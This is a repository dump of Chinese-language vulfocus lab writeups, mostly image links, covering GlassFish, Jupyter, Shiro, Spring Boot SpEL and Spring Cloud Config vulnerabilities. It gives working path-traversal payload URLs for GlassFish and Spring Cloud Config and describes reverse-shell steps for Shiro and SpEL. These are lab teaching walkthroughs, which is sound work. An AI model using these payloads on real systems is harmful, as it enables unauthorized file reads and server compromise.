https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Fastjson_1.2.47反序列化导致任意命令执行漏洞_fengyehack/9.png
--------------------------------------------------------------------------------
/writeup/GlassFish任意文件读取漏洞/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/GlassFish任意文件读取漏洞/1.png
--------------------------------------------------------------------------------
/writeup/GlassFish任意文件读取漏洞/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/GlassFish任意文件读取漏洞/2.png
--------------------------------------------------------------------------------
/writeup/GlassFish任意文件读取漏洞/GlassFish任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # GlassFish任意文件读取漏洞
2 |
3 | ## 漏洞概述
4 |
5 | glassfish 是一款 java 编写的跨平台的开源的应用服务器。漏洞原理与宽字节 SQL 注入一致,都是由于 unicode 编码歧义导致的。java 中会把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符的"."(点), 所以 glassfish 这个 poc 实际上就是../../../../../../../../../../../xxx/xxx
6 |
7 | ## 复现
8 |
9 | 首先打开靶场,启动加载页面可能会慢,等一会就好。
10 |
11 | 
12 |
13 | 直接读 tmp 文件下的 Flag,POC 如下:
14 |
15 | `/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/tmp`
16 |
17 | 
18 |
19 |
--------------------------------------------------------------------------------
/writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/1.png
--------------------------------------------------------------------------------
/writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/2.png
--------------------------------------------------------------------------------
/writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/JupyterNotebook未授权访问漏洞.md:
--------------------------------------------------------------------------------
1 | # Jupyter Notebook 未授权访问漏洞 by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
6 |
7 | ## 利用流程
8 |
9 | 访问地址: `10.10.11.20:65404`
10 |
11 | 名称:Jupyter Notebook 未授权访问漏洞
12 |
13 | 登陆后新建 Terminal 窗口
14 |
15 | 
16 |
17 | 执行命令查看 flag
18 |
19 | 
20 |
21 |
22 | 通关!
23 |
24 | ## 参考
25 |
26 |
27 |
28 | https://www.cnblogs.com/mke2fs/p/12718499.html
29 |
30 |
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片1.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片10.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片11.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片12.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片13.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片14.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片15.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片16.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片17.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片2.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片3.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片4.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片5.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片6.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片7.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片8.png
--------------------------------------------------------------------------------
/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Laravel_Debug_mode远程代码执行_anxianglang/图片9.png
--------------------------------------------------------------------------------
/writeup/PHP-CGI远程代码执行/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP-CGI远程代码执行/1.png
--------------------------------------------------------------------------------
/writeup/PHP-CGI远程代码执行/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP-CGI远程代码执行/2.png
--------------------------------------------------------------------------------
/writeup/PHP-CGI远程代码执行/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP-CGI远程代码执行/3.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片1.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片10.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片11.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片2.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片3.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片4.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片5.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片6.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片7.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片8.png
--------------------------------------------------------------------------------
/writeup/PHP文件包含之利用phpinfo/images/图片9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/PHP文件包含之利用phpinfo/images/图片9.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片1.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片10.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片11.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片12.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片13.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片14.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片15.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片16.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片17.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片17.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片18.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片18.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片19.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片19.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片2.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片20.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片21.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片21.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片22.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片22.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片23.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片23.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片3.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片4.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片5.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片6.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片7.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片8.png
--------------------------------------------------------------------------------
/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SaltStack_远程命令执行漏洞_FlyYoung729/图片9.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/1.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/2.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/3.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/4.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/5.png
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/Shiro_RememberMe1.2.4反序列化.md:
--------------------------------------------------------------------------------
1 | # Shiro RememberMe 1.2.4 反序列化 by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 一、漏洞描述
4 |
5 | 从官方的 issue 上来看,漏洞的利用点是在 cookie 里的 rememberMe 参数,这个参数的值是 AES 加密再 base64 之后设置在 cookie中 的。在服务端对 rememberMe 的 cookie 值的操作应该是先 base64 解码然后 AES 解密再反序列化,就导致了反序列化 RCE 漏洞。
6 |
7 | ## 二、影响版本
8 |
9 | ```
10 | 漏洞版本<=1.2.4
11 | ```
12 |
13 | ## 三、利用流程
14 |
15 | 访问地址: `10.10.11.20:59041`
16 |
17 | 名称: shiro 反序列化漏洞
18 |
19 | 将反弹命令进行编码
20 |
21 | 
22 |
23 | 利用 python 脚本将 payload.cookie 生成到 /tmp 下
24 |
25 | 
26 |
27 | 
28 |
29 | 抓取数据包,并将 cookie 添加到数据包中进行发送。
30 |
31 | 
32 |
33 | 使用 nc 监听端口,反弹 shell 成功。
34 |
35 | 
36 |
37 | ## 四、修复方案
38 |
39 | 升级 shiro 到 1.2.5 及以上
40 |
41 |
--------------------------------------------------------------------------------
/writeup/Shiro_RememberMe_1.2.4_反序列化/~$1.docx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Shiro_RememberMe_1.2.4_反序列化/~$1.docx
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/SpringBoot_SpEL表达式注入漏洞.md:
--------------------------------------------------------------------------------
1 | # Spring Boot whitelabel-error-page SpEl 代码执行漏洞 by [fengyehack](https://github.com/fengyehack)
2 |
3 | ## 一、漏洞描述
4 |
5 | Spring是一款轻量级Java开发框架。Spring Boot是Spring 的一个核心子项目,其设计目的是用于简化新Spring应用的初始搭建以及开发过程。 由于SpelView类中的exactMatch参数未严格过滤,Spring Boot framework 对异常处理不当在同时开启whitelabel page,会造成异常请求中注入SPEL执行。当用户采用Spring Boot启动Spring MVC项目后,Spring Boot默认异常模板在处理异常信息时,会递归解析SPEL表达式,可导致SPEL表达式注入并执行。攻击者利用此漏洞,通过SPEL即可在服务器端实现指令注入(执行代码)。
6 |
7 | ## 二、漏洞影响版本
8 |
9 | Spring Boot 1.1-1.3.0的版本
10 |
11 | ## 三、漏洞复现
12 |
13 | 启动Vulfocus
14 |
15 | 
16 |
17 | 
18 |
19 | 点击这个链接,出现了拼接的字符,证明漏洞存在。
20 |
21 | 
22 |
23 | 直接反弹shell:
24 |
25 | 出现这个代表代码执行成功
26 |
27 | 
28 |
29 | 
30 |
31 | 成功拿到shell
32 |
33 | 
34 |
35 | 获取flag
36 |
37 | 
38 |
39 |
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202736807.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202736807.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202901979.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202901979.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202940611.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614202940611.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204043236.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204043236.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204135089.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204135089.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204205954.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204205954.png
--------------------------------------------------------------------------------
/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204355178.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/SpringBoot_SpEL表达式注入漏洞/image-20200614204355178.png
--------------------------------------------------------------------------------
/writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/1.png
--------------------------------------------------------------------------------
/writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/2.png
--------------------------------------------------------------------------------
/writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/Spring_Cloud_Config_Server_目录遍历漏洞.md:
--------------------------------------------------------------------------------
1 | # Spring Cloud Config Server 目录遍历漏洞(CVE-2020-5410) by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 概述
4 |
5 | Spring Cloud Config,2.2.x 之前的2.2.x 版本,2.1.9之前的2.1.x 版本以及较旧的不受支持的版本允许应用程序通过 spring-cloud-config-server 模块提供任意配置文件。恶意用户或攻击者可以使用特制 URL 发送请求,这可能导致目录遍历攻击。
6 |
7 | ## 复现
8 |
9 | 1、首先打开靶场。
10 |
11 | 
12 |
13 | 2、通过目录遍历拿到 Flag
14 |
15 | 
16 |
17 |
--------------------------------------------------------------------------------
/writeup/Spring_Cloud_Config目录穿越漏洞_xiajibaxie/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Cloud_Config目录穿越漏洞_xiajibaxie/1.jpg
--------------------------------------------------------------------------------
/writeup/Spring_Cloud_Config目录穿越漏洞_xiajibaxie/CVE-2020-5410.md:
--------------------------------------------------------------------------------
1 | # Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)by [xiajibaxie](https://github.com/xiajibaxie)
2 |
3 | ## 漏洞描述
4 |
5 | Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持,使用 Config Server ,用户可以在所有环境中管理应用程序的外部属性。近日,百度云安全团队监测到 Spring Cloud Config 官方发布了一个目录遍历漏洞的风险通告,漏洞编号为 CVE-2020-5410 。攻击者可通过构造特殊的 HTTP 请求,从而跨目录读取文件。
6 |
7 | ## 影响版本
8 |
9 | 2.2.x<=2.2.2
10 | 2.1.x<=2.1.8
11 |
12 | ## 利用流程
13 |
14 | 访问地址: `10.10.11.20:32446`
15 |
16 | 名称:CVE-2020-5410 Spring Cloud Config 目录穿越漏洞
17 |
18 |
19 |
20 | 1执行命令查看 tmp 文件获得 flag
21 |
22 | ```
23 | http://10.10.11.20:32446/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development
24 | ```
25 |
26 | 
27 |
28 | 通关!
29 |
30 | ## 参考
31 |
32 | https://xz.aliyun.com/t/7877
33 |
--------------------------------------------------------------------------------
